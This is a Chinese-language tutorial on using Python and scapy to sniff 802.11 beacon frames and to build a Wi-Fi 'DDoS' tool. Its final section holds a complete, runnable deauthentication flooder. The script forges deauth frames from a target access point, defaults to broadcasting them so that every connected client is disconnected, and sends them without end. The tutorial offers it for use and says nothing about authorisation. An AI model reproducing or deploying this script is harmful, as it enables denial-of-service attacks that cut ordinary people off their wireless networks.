教你用python打造WiFiddos

本文来源于i春秋学院，未经允许严禁转载。

0x00 前言
因为在百度上很难找到有关于用python打造WiFidos的工具的，而且不希望大家成为一名脚本小子，所以我打算写一篇，需要的工具有scapy，iwconfig（能开启你网卡监听功能的工具），当然少不了python，我这里是kali2.0的环境，所以可能跟你们的有所不同
0x01配置scapy
先打开python2.7解释器，scapy是只支持2.x的，不支持3，先输入下列命令，在python解释器里面

from scapy.all import *

会出现如下图的显示
 
这种情况是因为他有IPV6的东西包含了进去，这些东西不必要而且还影响整个程序的美观，所以要把这东西去掉。
在kali里面scapy有好几个，但是真正是给python用的就是这个路径：usr/share/pyshared/scapy
 
打开all.py把里面导入ipv6的东西注释掉
 
把这3行注释了在用一下

from scapy.all import *

这次就不会有那个东西了
 
但是我们还没有配置完，还有一个地方要配置，因为scapy的send函数，只要发送一个数据包就会执行

print "send %s packets"

还有

os.write(1,'.')

但是我们如果要发送多个数据包的时候，那这种功能就变成刷屏了，
这些功能是在：usr/share/pyshared/scapy下一个叫sendrecv，我这里直接搜索了
 
打开这个文件，找到__gen_send这个函数，然后把他的输出的地方注释了，然后在底下输入pass，不然会报错，如下图所示
 
好了我们现在就算配置完毕了。
0x02 802.11数据包结构简单分析 （不会对原理过多讲解）
要用wireshark捕获802.11数据包首先要让网卡变成监听模式
下面是iwconfig方法开启

ifconfig iface down

iwconfig iface mode monitor

ifconfig iface up

下面是aircrack-ng开启

airmon-ng start iface

2种方法都行，现在开始分析
首先802.11数据包有一个RadioTap头
 
注意我箭头指着的地方，那里就是RadioTap头，radiotap包含一些关于数据帧的额外信息，想了解更多可以参考http://www.radiotap.org
之后就是IEEE 802.11数据
 
这里只提几个地方
第一个Type/Subtype，简单来说，就是来声明这个数据包是什么拿来干什么的。
第二个就是receiver address(RA)和destination address(DA)，为什么要把这2个放在一起讲呢，就是因为这2个其实是完全一样的，如下图
 
2个的数据包真实的地方是完全一样的，这个地址代表最终要到达的地方
第三个就是transmitter address(TA)和source address(SA)，他们跟第二个也是相同，都是一样的，所以一起讲，TA就是当前发送数据包的地址，SA代表源发送地址，所以都是自己
第四个就是bssid，bssid就是路由器的地址
第五个就是ESSID（ESSID就是WiFi的名字），只会出现在type/subtype是0/8，也就是beacon frame的时候，beacon frame就是用来通知别人他的存在，里面会包含一些其他数据，其中就有ESSID，这个数据包不是上面4个那样，他是跟在他们屁股后面的，如图
 
essid就在如下图的地方
 
0x03 打造一款简易WiFi探测器
现在基础的部分讲完，开始真正实战了。
首先看看我们需要的数据包，scapy是一款很强大的工具，提供各种数据包类型，可以用ls()查看
这里我们只需要和802.11相关的，也就是如下图所示
 
也就是RadioTap()   Dot11()   Dot11Elt，当然，还有一个Dot11Deauth，但是不是这个小节要讲的，所以先不说RadioTap()也不用怎么讲，知道他是第一个就好了，这些都是用来构造数据包的方法
先来看看Dot11这个数据包
 
这里addr1就是刚刚的RA DA，addr2就是TA SA，addr3就是BSSID，（应该是这样，我也不能肯定，如果有错尽管指出）
在来看看Dot11Elt
 
这里info就是ESSID了，
还有一个函数需要了解一下，就是sniff()，他的功能就跟他的名字一样，用来嗅探的，他有1个参数需要提一下，prn=func，当嗅探到一个数据包的时候就会调用func，并且把数据包传给func
现在该说的都说了，我就把代码全部拿出来吧

#coding:utf-8

from scapy.all import *

wifi = {}

def scan(packet):

    dot = packet.getlayer(Dot11)#从数据包里面提取Dot11这一层的数据，如果没有这一层，返回None

    if dot != None:

        elt = dot.getlayer(Dot11Elt)#从数据包提取Dot11Elt这一层的数据

        if elt != None:

             

            if dot.type == 0 and dot.subtype == 8:#检查是否为beacon frame数据包，因为beacon frame是用来通知用户自己的存在的

                     bssid = dot.addr3.upper()#提取BSSID

                     essid = elt.info#提取ESSID

                     if not wifi.has_key(bssid):#检查是否已经存在字典中，以免打印重复

                         wifi[bssid]=essid

                         if essid == "":#有些路由器会隐藏自己的ESSID所以这里为空

                             essid = "<hidden>"

                         print essid+": "+bssid

sniff(prn=scan)#绑定scan函数

 
这就是运行效果，第一行我之前没有去掉，所以有第一行
0x04 打造WiFiDDOS器
如何DDOSWiFi呢，其实很简单，因为802.11的设计导致的，这里有一个Deauth数据，当路由器或者用户发生一些问题的时候，路由器就会发送Deauth数据包来告诉用户不能连接了，然后用户就会与路由器断开连接，所以我们就模拟这种数据包，发送数据包，来达到断网
当要发送Deauth数据包的时候，Dot11的type/subtype是0/12的时候，因为type默认为0，所以待会构造数据包的时候只用让subtype等于0xC就好，然后一个Dot11Deauth会跟在Dot11后面，就像如图的那种关系
 
就类似与这样的关系，代码就是这样构造的

RadioTap()\Dot11()\Dot11Deauth()

有1个函数要介绍一下sendp，工作在第二层用来发送数据包的，有一个参数要说一下，就是iface=网卡，用来设置什么网卡来发送数据包的，要发送的数据包直接放在参数第一个，比如数据包的名字叫pkt，网卡为wlan0，那就是sendp(pkt,iface='wlan0')

#coding:utf-8

import sys

from scapy.all import *

from optparse import OptionParser#这个我不讲，因为不是本章重点，请自行百度

usage="Usage:%prog -i interface -t packet-type -a bssid -c client-MAC(optional)"

parser=OptionParser(usage)

parser.add_option('-i',dest="interface",help="network card")

parser.add_option('-t',dest="type",help="the reason for the termination code,0-9(optional)")

parser.add_option('-a',dest="bssid",help="the Access Point you want to attack")

parser.add_option('-c',dest="c_mac",help="the client's MAC address(optional)")

(options,args) = parser.parse_args()

if len(sys.argv) < 2:

    parser.print_help()

    sys.exit(0)

elif options.interface is None or \

     options.bssid is None:

        parser.print_help()

        sys.exit()

c_mac = options.c_mac

t_type = options.type

iface = options.interface

bssid = options.bssid

if t_type == None:

    t_type = 0

if c_mac == None:

    c_mac = "ff:ff:ff:ff:ff:ff".upper()#如果用户没有输入地址，就赋值为广播地址（让连接WiFi的全部断网）

pkt = RadioTap()/\

Dot11(subtype=0x00c,addr1=c_mac,addr2=bssid,addr3=bssid)/\#addr1为最终要到达的地址，addr2为来源地址这伪造成路由器MAC，addr3就不说了，subtype为0x00c代表为Deauth数据包

Dot11Deauth(reason=int(t_type))#定义为什么会断线

while True:

    sendp(pkt,iface=iface)#无限发送数据包

0x05 结束语
我写这篇文章，主要的目的就是不希望大家成为一名脚本小子，只会用别人的工具，而不能自己开发工具，我感觉这样是很窝囊的，一辈子只能活在别人的脚下。